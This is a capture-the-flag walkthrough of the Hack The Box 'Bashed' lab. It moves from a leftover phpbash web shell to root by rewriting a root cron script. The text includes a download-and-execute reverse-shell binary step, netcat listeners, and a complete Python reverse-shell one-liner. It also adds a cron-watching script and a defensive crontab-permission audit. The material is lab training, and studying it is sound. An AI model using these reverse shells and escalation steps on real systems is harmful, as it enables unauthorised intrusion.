HTB: Bashed


I ran nmap and found only port 80 open.

❯ ports=$(nmap -p- -T4 -Pn -n $(gettarget) | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

❯ echo $ports 

❯ nmap -sC -sV -p$ports -Pn 
Starting Nmap 7.92 ( ) at 2022-05-08 18:15 BST
Nmap scan report for
Host is up (0.048s latency).

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds

The web server appears to be the only service, so I went to check it:

Interesting: it looks like this server has a file called “phpbash” on it. Clicking the “phpbash” title takes us to another page with a link to the “phpbash” GitHub repository:

The page tells us that “phpbash” is developed on this exact server, and the GitHub description says “phpbash is a semi-interactive PHP shell compressed into a single file”. If the “phpbash” file is really on this server, it could be a very useful foothold: a web shell the developer left behind in the web root.

User flag

I tried a few URL paths by hand trying to find the phpbash file, without success, so I used gobuster to brute-force directories, and found some interesting ones:

❯ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/05/08 18:31:00 Starting gobuster in directory enumeration mode
/images               (Status: 301) [Size: 317] [-->]
/uploads              (Status: 301) [Size: 318] [-->]
/php                  (Status: 301) [Size: 314] [-->]    
/css                  (Status: 301) [Size: 314] [-->]    
/dev                  (Status: 301) [Size: 314] [-->]    
/js                   (Status: 301) [Size: 313] [-->]     
/fonts                (Status: 301) [Size: 316] [-->]

I tried some of the directories and finally found the phpbash shell at “”:

A quick enumeration found the flag in the “/home/arrexel/” directory. Luckily for me, user.txt has read permission for “others”, so I was able to read it as www-data.

Root flag

First I created a reverse shell, just for convenience. I tried a bash reverse shell without success, so I ended up downloading a C reverse shell and uploading the compiled binary to the target:

❯ git clone

❯ cd c-reverse-shell

# the repo includes a script to quickly change the ip and port, so we don't need to edit the code
❯ ./ 4444

# now compile!
❯ make

❯ python3 -m http.server 8080

I downloaded the binary onto the target and executed it:

www-data@bashed:/dev/shm# wget
# chmod +x doesn't work
www-data@bashed:/dev/shm# chmod 711 reverse.elf
www-data@bashed:/dev/shm# ./reverse.elf

I upgraded the shell:

❯ nc -lvvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 54798

python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bashed:/dev/shm$ export TERM=xterm
www-data@bashed:/dev/shm$ ^Z

❯ stty raw -echo; fg


We are ready; time to upload the file for a quick enumeration.

I found something interesting:

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

I can run any command as the “scriptmanager” user without a password, so let’s open a bash session as that user:

www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash

I ran it again as the scriptmanager user to see what we can do with this user. I found that scriptmanager owns a directory called “scripts” in “/”:

╔══════════╣ Unexpected in root
╔══════════╣ Modified interesting files in the last 5mins (limit 100)

It contains two files:

scriptmanager@bashed:/dev/shm$ ls -la /scripts/
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017
-rw-r--r--  1 root          root            12 May  8 10:17 test.txt

According to the output above, the “test.txt” file was modified in the last 5 minutes, which is strange.

If we take a look at the “” and “test.txt” files, we notice that “test.txt” is a file created by the “” script. So, if “test.txt” was modified in the last 5 minutes and it is a file that “” creates, we can assume “” is being run from a cron, probably as root, because root is the owner of “test.txt”. And since “/scripts” and the script itself are owned by scriptmanager, the user we already are, we can rewrite that script with whatever we want root to execute.
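Before planting anything, it is worth confirming the cron hypothesis and learning how long the wait will be. The following is an added example, not code from the original writeup: it samples the file's mtime and owner and prints each rewrite together with the interval since the previous one. It assumes GNU coreutils (stat and date) and, by default, the /scripts/test.txt path from the listing above.

```sh
# Added example, not from the writeup: confirm that a file is rewritten on a
# schedule by sampling its mtime and owner. Assumes GNU coreutils (stat, date).
# Usage: sh watch_rewrites.sh /scripts/test.txt [interval_seconds] [samples]

# Modification time of a file as a Unix timestamp.
mtime_of() {
    stat -c %Y "$1"
}

# Owner of a file.
owner_of() {
    stat -c %U "$1"
}

# Poll FILE every INTERVAL seconds for up to SAMPLES samples. Each time the
# mtime changes, print when it happened, who owns the new file and how many
# seconds passed since the previous rewrite. Returns 0 if at least one rewrite
# was observed, 1 if none, 2 if the file could not be read.
watch_rewrites() {
    file="$1"; interval="${2:-5}"; samples="${3:-24}"
    last=$(mtime_of "$file") || return 2
    seen=1
    i=0
    while [ "$i" -lt "$samples" ]; do
        sleep "$interval"
        now=$(mtime_of "$file") || return 2
        if [ "$now" -ne "$last" ]; then
            printf 'rewritten at %s by %s, %d s after the previous write\n' \
                "$(date -d "@$now" '+%T')" "$(owner_of "$file")" "$((now - last))"
            last=$now
            seen=0
        fi
        i=$((i + 1))
    done
    return "$seen"
}

# Only run the watcher when a path is given, so the functions can also be sourced.
if [ -n "${1:-}" ]; then
    watch_rewrites "$1" "${2:-5}" "${3:-24}"
fi
```

Two or three observed rewrites, all owned by root at a regular spacing, are the evidence that something privileged is running the script on a timer; the printed interval is how long the listener will have to wait for the callback.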

I modified the “” file with nano so that the script now contains a python reverse shell. Now I only have to listen with netcat and wait: the next time root executes “”, I get a reverse shell as root.

scriptmanager@bashed:/scripts$ cat 
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

After waiting a few seconds I got the reverse shell:

❯ nc -lvvnp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 37980
# whoami

And that’s all! I’m root.
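The root cause on this box is root executing a script out of a directory that a lower-privileged user owns. As an added example, not part of the original writeup, here is a small POSIX shell audit for that pattern: it parses an /etc/crontab-style file (“min hour dom mon dow user command …” or “@daily user command …”) and flags every job whose program, or the directory holding it, can be modified by a non-root user. It assumes GNU stat; the crontab path is whatever you pass in, and the sample crontab in the usage is constructed for illustration.

```sh
# Added example, not from the writeup: flag cron jobs whose script can be
# modified by a non-root user, which is the condition that made /scripts
# exploitable. Assumes an /etc/crontab-style file and GNU stat.
# Usage: . ./audit_crontab.sh; audit_crontab /etc/crontab

# Print "user command ..." for each job in a crontab file, dropping comments,
# blank lines, VAR=value settings and the schedule fields.
cron_jobs() {
    grep -v '^[[:space:]]*#' "$1" |
        grep -v '^[[:space:]]*$' |
        grep -v '^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' |
        awk '{ n = ($1 ~ /^@/) ? 1 : 5
               for (i = 1; i <= n; i++) $i = ""
               sub(/^ +/, ""); print }'
}

# Return 0 if PATH or its parent directory is owned by someone other than
# root, or has the group/other write bit set; 1 otherwise. A non-root owner
# can rewrite the file; a writable directory lets them replace it.
writable_by_non_root() {
    for p in "$1" "$(dirname "$1")"; do
        [ -e "$p" ] || continue
        [ "$(stat -c %U "$p")" != root ] && return 0
        case $(stat -c %A "$p") in
            ?????w*|????????w?) return 0 ;;   # group or other write bit
        esac
    done
    return 1
}

# For each job, resolve the program that actually runs (the script itself when
# the command is "python /path/script.py" or similar) and print
# "user<TAB>program<TAB>command" for every one a non-root user could change.
audit_crontab() {
    cron_jobs "$1" | while read -r user cmd; do
        prog=${cmd%% *}
        case ${prog##*/} in
            python*|perl*|sh|bash|dash)
                prog=$(printf '%s\n' "$cmd" | awk '{ print $2 }') ;;
        esac
        [ -n "$prog" ] || continue
        if writable_by_non_root "$prog"; then
            printf '%s\t%s\t%s\n' "$user" "$prog" "$cmd"
        fi
    done
}
```

Run it against /etc/crontab and each file in /etc/cron.d that you can read. The same owner and write-bit test applies to the scripts in /etc/cron.hourly and friends, which are directories of executables rather than crontab lines. A job that never shows up in any readable crontab, like the one inferred above from the mtime of test.txt, is exactly the case where the file-permission check on the script is the only signal an unprivileged user gets.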


